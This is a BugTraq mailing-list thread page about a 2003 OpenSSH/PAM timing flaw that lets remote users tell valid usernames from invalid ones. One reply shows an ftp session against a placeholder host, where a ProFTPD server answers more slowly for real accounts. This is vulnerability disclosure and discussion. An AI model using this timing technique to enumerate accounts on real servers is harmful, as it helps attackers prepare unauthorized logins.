BugTraq
OpenSSH/PAM timing attack allows remote users identification Apr 30 2003 02:34PM
Marco Ivaldi (raptor mediaservice net) (4 replies)
Re: OpenSSH/PAM timing attack allows remote users identification May 02 2003 01:15PM
Michael Shigorin (mike osdn org ua) (1 replies)
Re: OpenSSH/PAM timing attack allows remote users identification May 02 2003 01:48PM
Marco Ivaldi (raptor mediaservice net)
Re: OpenSSH/PAM timing attack allows remote users identification May 02 2003 12:56AM
Karl-Heinz Haag (k haag linux-ag com)
Re: OpenSSH/PAM timing attack allows remote users identification May 01 2003 03:20PM
Thilo Schulz (arny ats s bawue de) (1 replies)
On Wednesday, 30th April 2003 16:34 Marco Ivaldi wrote:
> During a pen-test we stumbled across a nasty bug in OpenSSH-portable with
> PAM support enabled (via the --with-pam configure script switch). This bug
> allows a remote attacker to identify valid users on vulnerable systems,
> through a simple timing attack. The vulnerability is easy to exploit and may
> have high severity, if combined with poor password policies and other
> security problems that allow local privilege escalation.

This is !!NOT!! a problem specific to openssh.
When I saw this topic come up I tried the same with proftpd, which also can
use pam to establish the user's authentication.

here is an example with the simple ftp tool:
thilo@Thilo thilo $ ftp www.someftphost.net
Connected to www.someftphost.net.
220 ProFTPD 1.2.5rc1 Server (Debian) [www.someftphost.net]
Name (www.someftphost.net:thilo): thilo
331 Password required for thilo.
Password:
[valid user account, but wrong password: 2seconds wait]
530 Login incorrect.
Login failed.
ftp>

same here, if this is an invalid user, there is no delay between the entering
of the password and the 530 reply.
I tested the postfix smtp daemon, apache and ipopd pop3 daemon which have pam
support, there this weakness is obviously not present, yet don't consider all
daemons secure, there may still be many others out there that suffer from the
same weakness.

- Thilo Schulz

[ reply ]
Re: OpenSSH/PAM timing attack allows remote users identification May 02 2003 11:20AM
Marco Ivaldi (raptor mediaservice net)
Re: OpenSSH/PAM timing attack allows remote users identification May 01 2003 09:12AM
Ethan Benson (erbenson alaska net) (2 replies)
Re: OpenSSH/PAM timing attack allows remote users identification May 05 2003 12:55PM
Marco Ivaldi (raptor mediaservice net)
Re: OpenSSH/PAM timing attack allows remote users identification May 01 2003 06:15PM
Nicolas Couture (nc stormvault net)


 

Privacy Statement
Copyright 2010, SecurityFocus